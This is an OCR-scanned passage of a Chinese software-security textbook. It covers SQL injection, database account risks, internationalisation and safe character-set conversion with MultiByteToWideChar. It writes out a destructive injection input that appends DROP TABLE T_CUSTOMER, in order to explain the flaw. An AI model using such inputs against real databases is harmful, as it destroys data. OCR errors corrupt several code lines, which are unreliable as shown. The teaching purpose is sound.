返回 ,此 种 情况 下 ,攻击 者 将 能 够 获得 表 T_CUSTOMER 中 所 有 数据 。 


呈 提 示 。 在 上 例 中 ,攻击 者 利用 在 查询 语句 最 后 部 分 的 注释 操作 符 ,创建 合法 却 有 
害 的 SQL 语句 。 攻 击 者 在 语句 最 后 放置 一 个 注释 操作 符 , 将 原 有 的 最 后 一 个 单 引 号 注 
释 掉 ,同时 使 SQL 语句 结束 。( 注 : 许多 关系 数据 库 服 务 器 ,包括 Microsoft SQL | 
Server,DB2、Oracle、PostgreSQL 和 MySql 都 支持 操作 注释 符 --。) | 


攻击 者 通过 这 种 技术 ,可 以 完成 以 下 攻击 活动 : 

。 改变 一 条 SQL 语句 的 具体 条 件 ; 

。 添加 并 且 运 行 额外 的 SQL 的 语句 ; 

。 秘密 调用 函数 和 存储 过 程 。 

在 有 些 数据 库 产品 中 允许 一 次 性 运行 多 条 语句 ,这 给 攻击 者 更 大 的 攻击 空间 。 如 
上 面 的 例子 ,如 果 攻 击 者 输入 : Guokehua'; DROP TABLE T_CUSTOMER --, 语 句 
变 为 ， 


SELECT * FROM T_CUSTOMER WHERE NAME = 'Guokehua'7 
DROP TABLE T_CUSTOMER 一 一 


这 条 语句 将 返回 表 T_CUSTOMER 列 NAME 值 为 Guokehua 的 行 ,然后 删除 
T_CUSTOMER 表 。 此 外 ,这 种 攻击 还 包括 各 种 可 以 改变 数据 库 结 构 的 操作 ,例如 创 
建 . 删 除 以 及 更 新 数据 库 对 象 等 。 

关于 SQL 注入 的 解决 方法 ,将 在 第 8 章 进行 详细 讲解 。 


5.3.3 账户 和 口令 问题 


在 应 用 程序 中 ,连接 到 数据 库 通常 要 确定 账户 和 口令 。 但 是 很 多 程序 员 对 这 一 点 
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不 讲究 ,直接 用 管理 员 账 户 连 接 到 数据 库 , 这 是 很 危险 的 。 例 如 ,在 SQL Server 中 ,以 
sa 进行 连接 是 很 危险 的 ,在 Oracle 数据 库 中 ,以 system 进行 连接 也 是 很 危险 的 ,它们 
都 是 功能 强大 且 很 可 能 对 各 自 系统 造成 损害 的 账户 。 

实际 上 ,应 用 程序 的 使 用 ,并 不 一 定 要 用 到 管理 员 账 户 ,使 用 管理 员 账 户 , 反 而 给 了 
攻击 者 更 多 的 机 会 。 如 在 SQL Server 中 , 当 连 接 以 sa 账户 进行 , 且 SQL 代码 中 有 
bug ,攻击 者 可 以 执行 任何 管理 员 账 户 可 以 执行 的 任务 ,如 : 

。 删除 系统 中 的 数据 库 或 表 ; 

。 删除 系统 中 表 中 的 数据 ; 

。 修改 系统 中 表 中 数据 ; 

。 修改 存储 过 程 、 触 发 器 ; 

。 删除 日 志 ; 

。 添加 新 的 数据 库 用 户 ,等 等 。 

很 多 情况 下 ,程序 员 会 将 口令 以 明文 的 形式 存放 于 代码 中 ,运行 阶段 ,这 些 口 令 置 
入 进程 的 内 存 空间 。 此 时 ,口令 如 果 被 攻击 者 获知 , 则 可 执行 攻击 者 希望 执行 的 任何 代 


。 码 。 危 险 性 也 很 大 。 


解决 以 上 问题 的 方法 主要 有 : 

不 到 万 不 得 已 ,不 使 用 管理 员 账 户 ; 

使 用 最 小 特权 账户 ,不 给 以 额外 的 权限 ; 

不 允许 使 用 空 口令 连接 数据 库 , 防 止 管理 员 玻 忽 而 创建 了 空 口令 ;， 

数据 库 连 接 字 符 串 存放 在 配置 文件 中 ,最 好 可 以 加 密 , 而 不 是 代码 中 以 明文 
显示 ; 

发 生 错 误 时 , 仅 给 客户 端 通知 信息 ,不 给 具体 原因 ,防止 攻击 者 利用 这 些 通 知 信 
息 进 行 数据 库 猜 测 ,等 等 。 


小 结 


本 章 主要 讲解 了 和 输入 有 关 的 几 个 安全 问题 。 首 先 讲解 了 普通 的 输入 安全 及 其 应 


。 对 措施 ,其 次 讲解 了 数据 库 输入 安全 和 解决 方案 。 在 真实 的 项 目 中 ,输入 方面 的 隐患 可 
， 能 表现 在 很 多 方面 ,所 以 应 该 针对 具体 情况 进行 解决 。 


练习 


1. 设计 一 个 案例 ,用 户 的 输入 可 能 造成 某 些 文件 的 丢失 。 
2. 在 Windows 中 设计 一 个 不 安全 的 文件 名 ,然后 测试 。 
3. 正则 表达 式 在 输入 验证 中 具有 重要 作用 。 编 写 一 段 代码 ,对 E-mail 输入 进行 


， 正则 表达 式 的 验证 。 
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4. 怎样 解决 本 节 中 的 两 个 数据 库 恶 意 输 入 的 问题 ? 
5. 直接 让 用 户 用 管理 员 账 户 连 接 到 数据 库 有 哪些 危害 ? 
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国际 化 安全 


国际 化 (internationalization) ,是 为 了 保证 软件 产品 适应 不 同 区 域 语言 要 求 的 一 种 
方式 。 由 于 英文 单词 internationalization 的 首 末 字符 1 和 n 之 间 的 字符 数 为 18 ,因此 
业界 内 常 把 I18N 作为 “国际 化 ”的 简称 。 

以 Web 应 用 为 例 , 随 着 经 济 的 发 展 ,全 球 经 济 一 体 化 已 经 慢 慢 成 为 一 种 主流 趋势 ， 
Web 应 用 要 求 必 须 能 够 支持 多 国语 言 。 对 于 同一 个 Web 应 用 ,在 不 同 的 语言 环境 下 
需要 显示 不 同 的 效果 以 方便 用 户 。 人 们 经 常 看 到 ,一 些 网 站 都 有 各 个 不 同 的 语言 版 本 ， 
在 运行 时 ,能 够 根据 客户 浏览 器 所 在 的 国家 和 语言 的 不 同 ,显示 不 同 的 用 户 界 面 。 

软件 支持 多 种 不 同 的 语言 , 绝 不 是 开发 了 软件 的 多 个 版 本 。 业 界 具 有 一 定 的 规则 
让 信息 进行 复 用 , 即 对 同样 信息 进行 各 种 代码 的 转换 。 这 样 可 以 使 当 需 要 在 应 用 程序 
中 添加 对 一 种 新 的 语言 的 支持 时 ,不 需要 重新 再 开发 一 个 软件 ,造成 重复 劳动 。 而 安全 
问题 就 存在 于 代码 转换 的 过 程 之 中 。 

本 章 主要 针对 国际 化 过 程 中 的 安全 问题 进行 讲述 ,首先 讲解 常见 的 国际 化 过 程 , 然 
后 讲解 国际 化 转 码 中 需要 注意 的 安全 问题 。 


6.1 国际 化 的 基本 机 制 


6.1.1 国际 化 概述 


随 着 经 济 全 球 化 的 发 展 ,软件 也 应 该 具有 支持 各 种 语言 和 地 区 的 能 力 。 国 际 化 的 
主要 目的 ,是 调整 软件 ,使 之 能 适用 于 不 同 的 语言 及 地 区 。 如 图 6-1 显示 了 一 个 表单 的 
两 种 显示 效果 。 

从 图 6-1 看 出 ,两 个 页 面 功能 相同 ,但 是 在 不 同 的 地 区 ,为 了 照顾 不 同 的 用 户 , 显 示 
界面 不 同 ,这 就 需要 在 开发 的 过 程 中 充分 考虑 国际 化 问题 。 

> 提示 “不 过 ,在 讲解 后 面 的 内 容 之 前 ,首先 应 该 有 一 个 基本 常识 : 软件 在 中 国 和 
美国 显示 效果 不 一 样 , 绝 不 是 开发 了 两 个 不 同 的 版 本 ,而 是 因为 同一 个 版 本 在 不 同 的 地 
区 展现 了 不 同 的 用 户 界 面 。 
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入 


用 户 名 Account 
密码 Password 
登录 LOGIN 
图 6-1 


与 国际 化 类 似 的 另 一 个 概念 是 本 地 化 (localization)。 在 业界 内 ,两 个 概念 一 般 一 
起 讲 , 有 时 候 甚至 被 等 同 起 来 。 不 过 ,从 概念 上 说 ,本 地 化 是 实现 国际 化 的 一 些 手段 的 
集合 。 

国际 化 的 概念 ,比较 偏向 表达 软件 的 设计 思想 ,要求 当 软 件 被 移植 到 不 同 的 语言 
地 区 时 ,软件 的 业务 逻辑 和 程序 源 代码 不 用 作 改 变 或 修正 ,但 是 软件 又 必须 让 该 地 区 和 
语言 的 用 户 方便 地 使 用 ; 本 地 化 的 概念 偏向 对 软件 进行 加 工 , 使 之 满足 特定 地 区 和 特 


定语 言 的 用 户 对 语言 和 功能 的 特殊 要 求 , 实 际 上 是 指 一 系列 工作 的 过 程 。 软 件 本 地 化 | 


工作 ,可 能 涉及 文字 的 翻译 ,用户 界面 布局 调整 .本 地 特性 开发 ,联机 文档 和 印刷 手册 的 
制作 ,以 及 保证 本 地 化 版 本 能 正常 工作 等 ,实际 上 也 算是 软件 质量 保证 活动 的 一 部 分 。 
国际 化 简称 为 18N, 本 地 化 由 于 其 单词 localization 的 L 和 N 之 间 有 10 个 字母 ,因此 
简称 为 L10N。 

国际 化 和 本 地 化 这 两 个 工作 ,一 个 是 设计 思想 ,一 个 是 工作 的 手段 ,相辅相成 , 互 为 
补充 。 在 有 些 企业 中 ,也 使 用 全 球 化 (globalization) 来 表示 国际 化 和 本 地 化 的 合 称 , 用 
G1IN 作为 简称 。 

从 具体 的 工作 内 容 上 说 ,国际 化 与 本 地 化 工作 ,实际 上 包括 的 细节 很 多 ,也 很 繁杂 。 
以 下 列举 一 些 常 见 的 工作 : 

。 不 同 语言 表达 方式 ; 

。 电子 文件 的 编码 ; 

。 数字 命名 系统 的 不 同 ; 
文字 书写 方向 (如 英语 是 从 左 到 右 .阿拉 伯 语 从 右 到 左 ); 
语言 细微 差别 (如 英国 英语 中 的 Colour 和 美国 英语 中 的 Color) ; 
。 货币; 
。 日 期 格式 ; 
。 数字 格式 ,等 等 。 


6.1.2 国际 化 过 程 


开发 软件 时 ,国际 化 和 本 地 化 对 开发 者 是 一 个 有 挑战 性 的 任务 。 很 多 软件 ,在 软件 


刚 开 始 设计 时 ,并 没有 考虑 到 需要 在 不 同 的 语言 和 地 区 使 用 ,于 是 就 没有 按照 国际 化 的 


思想 设计 ,但 是 一 段 时 间 之 后 ,软件 突然 出 现 要 在 其 他 地 区 使 用 的 任务 ,国际 化 和 本 地 


化 的 工作 将 会 十 分 艰难 。 


怎样 让 程序 从 一 开始 就 为 国际 化 和 本 地 化 提供 开发 基础 呢 ? 我 们 知道 ,软件 的 难 ， 
度 在 于 程序 的 业务 逻辑 ,一 般 情 况 下 不 应 该 随便 对 业务 逻辑 进行 改动 。 程 序 在 不 同 地 ， 
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> 
KR 
区 和 运行 的 过 程 中 ,实际 上 ,程序 的 逻辑 只 有 一 份 , 只 是 界面 的 表示 有 所 不 同 ,而 应 该 避免 


的 是 程序 逻辑 的 修改 。 因 此 ,通常 作法 是 : 将 文本 和 其 他 与 环境 相关 的 资源 单独 编写 ， 
与 程序 代码 相 分 离 。 这 样 ,在 理想 的 情况 下 ,应 对 变化 的 环境 时 ,无 须 修改 代码 ,只 需要 


修改 资源 ,从 而 简化 了 工作 。 
图 6-2 是 国际 化 (本 地 化 ) 的 基本 过 程 。 
应 用 程序 
i 1 
.2 谈 取 工具 
资源 文件 加 个 | 
图 6-2 


从 图 6-2 中 可 以 看 出 ,国际 化 过 程 包括 3 个 部 分 : 

(1) 资源 文件 。 是 一 个 文件 ,能 够 保存 各 种 不 同 语言 所 对 应 的 资源 。 

(2) 读 取 工具 。 能 够 根据 语言 来 读 取 资 源 文 件 。 

(3) 应 用 程序 。 调 用 读 取 工 具 , 读 取 资 源 文件 。 

很 多 软件 实现 了 国际 化 ,以 Java 框架 为 例 ,要 开发 一 个 支持 英文 和 中 文 的 欢迎 
界面 ,该 界面 标题 根据 系统 语言 的 不 同 而 自动 变化 ,可 以 利用 接 下 来 的 一 些 代码 来 

以 下 是 支持 英文 显示 的 资源 文件 : 


messageResource_en_US. properties 


welcomeMessage = Welcome to visit our system\! 


以 下 是 支持 中 文 显示 的 资源 文件 (在 Java 中 实现 了 转 码 ,将 “欢迎 您 来 到 本 系统 ” 


转化 成 了 ASCII 码 表示 ,用 native2ascii 来 实现 。 这 是 Java 的 语言 特点 ,其 他 语言 不 一 


定 相 同 ) 


messageResource_zh_CN. properties 


welcomeMessage = \u6B22\u8FCE\u60A8\u6765\u5230\u672C\u7CFB\u7EDF 


以 下 是 界面 类 : 
P06_01. java 


import java. awt. Color; 
import java. awt. Frame; 

import java. io. FileInputStream; 

import java. util. Locale; 

import java. util. PropertyResourceBundle; 


public class P06_01 extends Frame 
{ 
// 欢 迎 信息 
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private String welcomeText; 

// 系 统 语言 名 称 ,如 中 文 为 zh_CN, 英 语 (美国 ) 为 en_Us 等 

private String locale; 

public P06_01() throws Exception 

{ 
locale = Locale. getDefault(). toString(); // 得 到 系统 语言 
FileInputStream fis = // 载 入 文件 

new FileInputStream("messageResource " + locale + ".properties"); 

PropertyResourceBundle prb = new PropertyResourceBundle(fis); 


// 获 得 相应 文件 中 的 内 容 
welcomeText = prb.getString("welcomeMessage"); 
// 设 置 标题 


this. setTitle(welcomeText); 

this. setBackground( Color. yellow); 

this. setSize( 300,200); 

this. setVisible(true); 
} 
public static void main(String[ ] args) throws Exception 
{ 

P06 _01 p06 01 = new P06 01(); 


} 
} 
首先 ,将 系统 语言 变 为 中 文 (中 国 )。 如 果 使 用 的 是 Windows 系统 ,可 以 通过 控制 
面板 中 的 “区 域 和 语言 选项 "来 修改 ,参见 图 6-3。 
区 域 放 项 | 语言 | 高 级 | 
一 标准 和 格式 


这 个 选项 影响 一 | 某 些 程序 如 何 格式 化 数字 、 货 币 、 时 间 和 日 期 , 
人 “ 自 定义 ”选择 您 自己 的 格 


中 文中 国 ) | 自 定义 多 


CE | Ww 应 用 区 | 


图 6-3 


运行 ,得 到 如 图 6-4 所 示 的 界面 。 
然后 将 系统 语言 变 为 英语” ,运行 ,得 到 如 图 6-5 所 示 的 界面 。 
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号 提示 ”该 例 中 ,用 户 的 区 域 和 语言 需要 手工 切换 ,这 只 是 进行 一 个 简单 模拟 。 实 
际 操作 过 程 中 ,由 于 用 户 身 处 不 同 地 区 和 语言 环境 ,操作 系统 的 设置 自然 也 会 不 一 样 。 
如 在 美国 使 用 的 操作 系统 ,一 般 情况 下 ,区 域 和 语言 选项 设置 为 美国 。 


6.2 国际 化 中 的 安全 问题 


| 6.2.1 字符 集 


国际 化 过 程 中 , 遇 到 的 最 重要 的 问题 是 不 同 的 语言 文字 在 不 同 的 系统 中 具有 不 同 
的 表达 方式 ,也 就 是 通常 所 说 的 编码 。 编 码 是 不 同 国家 的 语言 在 计算 机 中 的 一 种 存储 
和 解释 规范 ,在 各 个 不 同 规范 中 ,存储 了 相应 能 够 表达 一 定 内 容 的 若干 字符 , 称 为 字 
符 集 。 

最 原始 的 字符 集 是 美国 国家 标准 学 会 (American National Standards Institute， 
ANSI) 的 美国 信息 交换 标准 码 (American Standard Code for Information Interchange， 
ASCII 字符 集 ) , 它 使 用 7 个 比特 来 表示 一 个 字符 ,总 共 表 示 128 个 字符 ; 不 过 ,由 于 一 
个 字 节 一 般 占用 8 个 比特 ,为 了 充分 利用 一 个 字 节 所 能 表达 的 最 大 信息 ,IBM 公司 对 
ASCII 字符 集 进行 了 扩展 ,用 一 个 字 节 来 表示 一 个 字符 .这 样 ,让 ASCII 码 字 符 集 总 共 
可 以 表示 256 个 字符 。 不 过 ,人 们 常 说 的 ASCII 码 字符 集 表达 的 还 是 128 个 字符 , 常 
见 的 ASCII 码 字 符 集 表 也 是 基于 128 字符 的 ASCII 码 字符 集 编写 的 。 

由 于 英文 和 大 部 分 的 西方 语言 都 是 以 字母 拼写 为 基础 的 ,需要 的 字母 数量 不 多 。 
因此 ,以 上 ASCII 码 字 符 集 对 这 些 语 言 的 表达 ,基本 能 够 胜任 。 但 是 ,世界 上 的 语言 
类 多 种 多 样 ,如 中 文 日 文 . 韩 文 等 ,语言 中 含有 的 文字 就 几 千 个 ,ASCII 字符 集 就 无 法 
胜任 其 表达 。 因 此 ,在 ASCII 字符 集 的 基础 之 上 ,又 派生 出 了 一 些 新 的 字符 集 , 如 


， GB2312、.UTF-8、.UTF-16 等 , 称 为 多 字 节 字符 系统 (Multi-Byte Character System， 


MBCS) 。 


提示 。 注意 ,同一 个 字 ,在 不 同 的 系统 中 可 能 有 不 同 的 表达 方式 。 如 "中国 人”， 
在 GB2312 字符 集 和 UTF-8 字符 集中 ,其 表达 方式 完全 不 一 样 ,读者 可 以 编写 相应 的 


， 程序 进行 验证 。 


有 人 可 能 会 问 ,为 什么 不 将 这 些 字符 集 统一 成 为 一 个 呢 ? 这 是 因为 各 种 字符 集 都 
有 其 发 布 的 历史 ,一 个 字符 集 发 布 一 段 时 间 , 功 能 需要 扩充 ,于 是 出 来 了 新 的 字符 集 ,但 
是 原 有 的 项 目 要 改 成 新 的 字符 集 , 需 要 花费 一 些 成 本 。 久 而 久之 ,就 造成 了 很 多 字符 集 
并 存 的 局 面 。 
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6.2.2 字符 集 转 换 


在 实际 的 项 目 中 , 源 数 据 可 能 来 自 于 不 同 的 字符 集 ( 如 支持 不 同 字符 集 的 数据 库 )， 
而 源 数据 需要 以 某 种 方式 被 目标 程序 使 用 ,如 显示 在 界面 上 ,或 者 被 目标 程序 进行 加 工 
等 。 这 时 候 遇 到 的 最 大 问题 就 是 : 目标 程序 所 支持 的 字符 集 和 源 数据 属于 的 字符 集 可 
能 不 一 致 。 此 种 情况 下 ,可 能 造成 系统 显示 出 错 。 下 面 根据 情况 的 不 同 进行 分 类 : | 

(1) 当 目 标 程序 所 支持 的 字符 集 和 源 数 据 属于 的 字符 集 完全 不 兼容 时 ,数据 无 法 ， 
显示 (或 者 以 乱码 形式 显示 )。 例 如 ,对 于 中 文 来 说 ,如 果 源 数据 库 使 用 字符 集 GBK ,从 
数据 库 中 查 出 来 的 中 文 内 容 , 想 要 在 目标 程序 上 使 用 ,而 目标 程序 默认 支持 ASCII, 由 
于 GBK 是 16 位 字符 集 ,而 ASCII 是 7 位 字符 集 ,两 者 完全 不 兼容 ,或 者 说 没有 任何 关 
系 , 每 一 个 中 文字 符 在 ASCII 中 ,都 不 能 够 找到 对 等 的 字符 ,所 以 所 有 中 文字 符 都 会 丢 
失 而 变 成 乱码 形式 。 

(2) 当 目 标 程序 所 支持 的 字符 集 是 源 数 据 属于 的 字符 集 的 子 集 时 ,信息 会 部 分 丢 ， 
失 。 例 如 ,如 果 源 数据 库 使 用 GBK ,而 目标 程序 字符 集 使 用 GB2312, 这 个 过 程 中 绝 大 ， 
部 分 字符 都 能 够 正确 转换 ,但 是 由 于 GB2312 字符 集 小 于 GBK, 因 此 一 些 超出 GB2312 ， 
字符 集 的 字符 变 为 乱码 。 

在 这 些 情 况 下 ,就 必须 进行 字符 集 转换 ,俗称 转 码 。 各 种 语言 中 都 有 不 同 的 转 码 支 
持 。 本 节 以 Visual C++ 为 例 来 讲解 转 码 问题 。 

在 Visual C++ 中 ,有 如 下 两 个 函数 对 转 码 进 行 支持 : 

。 MultiByteToWideChar; 

*。 WideCharToMultiByte。 

在 这 两 个 函数 中 ,MultiByte 称 为 短 字 符 , 一 般 为 8 位 或 8 位 以 内 来 表示 的 字符 ,如 
ASCII 码 。WideChar 称 为 宽 字符 ,一 般 指 用 16 位 或 以 上 (如 果 有 的 话 ) 表 示 的 字符 ,如 
UNICODE。 

MultiByteToWideChar 函数 的 功能 是 : 将 一 个 由 短 字 符 组 成 的 字符 串 转 换 为 一 个 
宽 字符 组 成 的 字符 串 。 函 数 原型 是 : 


int MultiByteToWideChar (UINT CodePage, 
DWORD dwFlags, 
LPCSTR lpMultiByteStr, 
int cchMultiByte, 
LPWSTR lpWideCharstr, 
int cchWideChar) 


由 于 本 书 内 容 所 限 , 不 对 该 函数 进行 详细 的 讲解 ,有关 各 参数 ,在 此 进行 简单 的 
阐述 口 : 

(1) CodePage: 指定 执行 转换 的 代码 页 (实际 上 就 是 字符 集 或 编码 方式 ) ,这 个 参数 可 
以 为 系统 已 安装 或 有 效 的 任何 代码 页 所 给 定 的 值 。 也 可 以 指定 其 为 下 面 的 任意 一 值 。 

。 CP_ACP: ANSI 代码 页 。 

。 CP_MACCP: Macintosh 代码 页 。 

。 CP_OEMCP: OEM 代码 页 。 
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。 CP_SYMBOL: 符号 代码 页 。 
。 CP_THREAD_ACP: 当前 线索 ANSI 代码 页 。 
| 。 CP_UTF7: 使 用 UTF-7 转换 。 
代 站 。CP_UTF8: 使 用 UTF-8 转换 。 
| (2) dwFlags: 一 组 标记 ,用 以 指出 字符 的 处 理 方式 。 可 以 是 以 下 标记 常量 的 组 
合 .含义 如 下 ， 
| 。 MB_PRECOMPOSED: 由 一 个 基本 字符 和 一 个 非 空 字符 组 成 的 字符 ,只 有 一 
个 单一 的 字符 值 。 这 是 默认 的 转换 选择 。 不 能 与 MB_COMPOSITE 值 一 起 使 
用 。 注 意 ,推荐 使 用 该 标志 ,因为 这 会 在 某 种 程度 上 消除 产生 组 合 字 符 的 可 能 
并 加 速 规范 化 。 
MB_COMPOSITE: 由 一 个 基本 字符 和 一 个 非 空 字符 组 成 的 字符 ,分 别 有 不 同 
的 字符 值 。 这 是 默认 的 转换 选择 。 该 选项 不 能 与 MB_PRECOMPOSED 值 一 
起 使 用 。 
MB_ERR_INVALID_CHARS: 如 果 函 数 遇 到 无 效 的 输入 字符 ,将 运行 失败 。 
该 标记 能 够 捕获 未 定义 的 字符 ,因此 ,在 不 大 于 50 000 的 CodePage 中 ,推荐 使 
用 该 标记 。 
。 MB_USEGLYPHCHARS: 使 用 象形 文字 替代 控制 字符 。 
(3) lpMultiByteStr: 将 被 转换 字符 串 的 字符 。 
(4) cchMultiByte: 指定 由 参数 lpMultiByteStr 指向 的 字符 串 中 字 节 的 个 数 。 如 
果 这 个 值 为 一 1, 字 符 串 将 被 设 定 为 以 NULL 为 结束 符 的 字符 串 , 并 且 自 动 计算 长 度 。 
(5) lpWideCharStr: 指向 接收 被 转换 字符 串 的 缓冲 区 。 
| (6) cchWideChar: 指定 由 参数 lpWideCharStr 指向 的 缓冲 区 的 字 节 个 数 。 若 此 
， 值 为 零 ,函数 返回 缓冲 区 所 必需 的 宽 字符 数 。 
该 函数 返回 值 含义 为 : 
。 如 果 函 数 运行 成 功 ,并 且 cchWideChar 不 为 零 ,返回 值 是 由 lpWideCharStr 指 
向 的 缓冲 区 中 写 入 的 宽 字符 数 ; 
。 如 果 函 数 运行 成 功 ,并 且 cchMultiByte 为 零 . 返 回 值 是 接收 到 待 转换 字符 串 的 
缓冲 区 所 需求 的 宽 字符 数 大 小 ; 
。 如 果 函 数 运行 失败 ,返回 值 为 零 。 
WideCharToMultiByte 函数 功能 是 : 将 一 个 由 宽 字 符 组 成 的 字符 串 转换 为 一 个 由 
短 字 符 组 成 的 字符 串 。 函 数 原型 是 : 


int WideCharToMultiByte(UINT CodePage, 
DWORD dwFlags, 
LPWSTR lpWideCharStr, 
int cchWideChar, 
LPCSTR lpMultiByteStr, 
int cchMultiByte, 
LPCSTR lpDefaultChar, 
PBOOL pfUsedDefaultChar ) 
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@ CodePage。 指 定 执行 转换 的 代码 页 (字符 集 或 编码 方式 ), 意义 和 
MultiByteToWideChar 中 类 似 。 
@ dwFlags。 一 组 位 标记 ,用 以 指出 字符 的 处 理 方式 ,意义 和 MultiByteToWideChar 


中 类 似 ; 不 过 ,该 参数 还 有 一 个 WC_NO_BEST_FIT_CHARS 标记 推荐 使 用 ,该 标记 ， 


可 以 防止 函数 将 字符 映射 到 相似 但 语义 完全 不 同 的 字符 上 。 
加 lpWideCharStr。 指 向 将 被 转换 的 unicode 字符 串 。 


@ cchWideChar。 指 定 由 参数 lpWideCharStr 指向 的 缓冲 区 的 字符 个 数 。 如 果 这 | 


个 值 为 一 1, 字 符 串 将 被 设 定 为 以 NULL 为 结束 符 的 字符 串 , 并 且 自 动 计算 长 度 。 

@ lpMultiByteStr。 指 向 接收 被 转换 字符 串 的 缓冲 区 。 

G@ cchMultiByte。 指 定 由 参数 lpMultiByteStr 指向 的 缓冲 区 最 大 值 (用 字 节 来 计 
量 )。 若 此 值 为 零 ,函数 返回 lpMultiByteStr 指向 的 目标 缓冲 区 所 必需 的 字 节 数 ,在 这 
种 情况 下 ,lpMultiByteStr 参数 通常 为 NULL。 

@ lpDefaultChar 和 pfUsedDefaultChar。 只 有 当 WideCharToMultiByte 函数 遇 
到 一 个 宽 字 节 字 符 , 而 该 字符 在 CodePage 参数 标识 的 代码 页 中 并 没有 它 的 表示 法 时 ， 
WideCharToMultiByte 函数 才 使 用 这 两 个 参数 。lpDefaultChar 意义 如 下 : 

。 如 果 宽 字 节 字符 不 能 被 转换 ,该 函数 便 使 用 lpDefaultChar 参数 指向 的 字符 ; 

。 如 果 该 参数 是 NULL( 这 是 大 多 数 情况 下 的 参数 值 ) ,那么 该 函数 使 用 系统 的 默 

认 字 符 。 
pfUsedDefaultChar 参数 指向 一 个 布尔 变量 : 


。 如 果 Unicode 字符 串 中 至 少 有 一 个 字符 不 能 转换 成 等 价 多 字 节 字符 ,那么 函数 


就 将 该 变量 置 为 TRUE; 

。 如 果 所 有 字符 均 被 成 功 地 转换 ,那么 该 函数 就 将 该 变量 置 为 FALSE。 

当 函 数 返 回 以 便 检查 宽 字 节 字 符 串 是 否 被 成 功 地 转换 后 ,可 以 测试 该 变量 。 

该 函数 的 返回 值 意义 为 : 

。 如 果 函 数 运行 成 功 ,并 且 cchMultiByte 不 为 零 ,返回 值 是 由 lpMultiByteStr 指 
向 的 缓冲 区 中 写 入 的 字 节 数 ; 

。 如 果 函 数 运 行 成 功 ,并 且 cchMultiByte 为 零 ,返回 值 是 接收 到 待 转换 字符 串 的 
缓冲 区 所 必需 的 字 节 数 ; 

。 如 果 函 数 运行 失败 ,返回 值 为 零 。 

在 Java 语言 中 ,字符 集 的 转换 也 具有 一 定 的 支持 ,列举 如 下 : 

。 编译 阶段 。 一 般 javac 根据 当前 操作 系统 区 域 设置 ,自动 决定 源 文件 的 编码 ,可 
以 通过 -encoding 强制 指定 。 如 : 


javac — encoding gb2312 Hello. java 


。 资源 文件 。 资 源 文件 一 般 为 . properties 文件 ,可 由 Properties 用 ISO-8859-1 编 
码 读 取 , 需 要 使 用 JDK 的 native2ascii 工具 转换 汉字 为 \uXXXX 格式 ,才能 正 
确 读 取 里 面 的 汉字 。 如 : 
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native2ascii — encoding GBK sourceFile destFile 


1 | 如 例 P06_01. java 中 ,中文 资源 文件 messageResource_zh_CN. properties 的 内 容 
到 ”FG 用 文本 编辑 器 打开 阅读 ): 


Note welcomeMessage = \u6B22\u8FCE\u60A8\u6765\u5230\u672C\u7CFB\LTEDF 


等 号 右边 的 内 容 实 际 上 就 是 “欢迎 您 来 到 本 系统 "经 过 native2ascii 命令 转 码 之 后 的 
结果 。 
。 字 节 数 组 。 可 使 用 new String (byteArray, encoding) 和 String. getBytes 
(encoding) 在 字 节 数组 和 字符 串 之 间 进 行 转换 。 如 下 例 ,如 果 得 到 的 字符 串 
string 是 由 ISO-8859-1 转 码 方式 产生 的 ,要 在 支持 GB2312 中 文 的 界面 上 显 
示 , 可 以 如 下 方式 转 为 正确 的 中 文 : 


string = new String(string. getBytes("IS0— 8859—1"), 
"GB2312"); 


。 JSP。 如 果 要 支持 汉字 ,可 在 头 部 加 上 : 


<% @ page contentType = "text/html; 
charset = gb2312" %> 


这 样 的 标签 。JSP 表单 的 过 程 中 ,经 常会 出 现 乱码 ,如 表单 中 的 中 文 汉字 无 法 被 获取 之 
后 成 为 乱码 ,此 时 可 以 采用 上 面 字 节 数 组 的 处 理 方法 ,也 可 以 使 用 : 


request. setCharacterEncoding("gb2312"); 


来 处 理 ,当然 ,也 可 以 编写 过 滤器 ,将 该 内 容 放 在 过 滤器 中 。 
。 Servlet。 如 果 要 输出 中 文 , 可 设置 : 


response. setContentType( "text/html; charset = GB2312"); 


另外 ,在 标记 语言 中 ,也 可 以 设置 其 编码 方式 。 
。 XML 文件 。XML 文件 读 写 同 于 文件 读 写 ,如 果 有 汉字 ,应 注意 确保 XML 头 
中 声明 如 


<? xml version = "1.0" encoding = "GB2312"?> 


与 文件 编码 保持 一 致 。 
。 HTML。 在 head 中 加 上 


<meta http - equiv = "Content 一 TYpe" 
content = "text/html; charset = GB2312"> 
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让 浏览 器 正确 确定 HTML 编码 。 


6.2.3 I18N 缓冲 区 溢出 问题 


在 转 码 时 ,如 果 使 用 不 当 , 就 会 出 现 缓冲 区 溢出 问题 。 这 种 情况 在 使 用 
MultiByteToWideChar 和 WideCharToMultiByte 函数 时 更 容易 出 现 , 在 此 进行 讲解 。 
如 下 函数 : 


int MultiByteToWideChar (UINT CodePage, 
DWORD dwFlags, 
LPCSTR lpMultiBytestr, 
int cchMultiByte, 
LPWSTR lpWideCharStr, 
int cchWideChar) 


函数 的 参数 5 中 ,定义 了 目标 字符 串 的 指针 。 怎 样 定义 目标 字符 串 呢 ? 一 种 方法 
是 ,事先 定义 一 个 足够 大 的 宽 字 符 数组 ,但 是 可 能 有 如 下 的 缺陷 ， 

。 当 lpMultiByteStr 占用 空间 较 小 时 ,可 能 会 造成 空间 浪费 ; 

。 如 果 为 了 避免 空间 浪费 ,分 配 的 数组 空间 较 小 , 当 lpMultiByteStr 占用 的 空间 

超过 了 预 分 配 空间 时 ,又 可 能 造成 缓冲 区 溢出 。 

因此 ,该 方法 不 是 一 个 最 好 的 办 法 。 

此 种 情况 下 ,需要 通过 一 些 手 段 来 获知 转 码 的 目标 数组 lpMultiByteStr 所 需要 的 
数组 空间 。 方 法 是 : 将 MultiByteToWideChar 函数 的 第 4 个 形 参 设 为 一 1, 即 可 返回 所 
需 的 短 字 符 数 组 空间 的 个 数 。 下 面 就 是 一 个 例子 : 


int nLen = MultiByteToWideChar (CP_UTF8, 0, 
lpMultiByteStr, —1, 
NULL, 0); 


nLen 中 得 到 的 就 是 所 需 的 短 字符 数组 空间 的 个 数 。 因 此 ,完整 的 安全 代码 结构 
如 下 : 


// 获得 需要 分 配 的 内 存 大 小 , 存 人 nLen 
int nLen = MultiByteToWideChar(CP_UTF8,MB_ ERR_INVALID CHARS, 
1pMultiByteStr, — 1, 
NULL, 0); 
if(nLen == 0) 
{ 
// 函数 调用 异常 , 作 异 常 处 理 
// 跳出 
} 
// 为 新 的 字符 串 分 配 内 存 
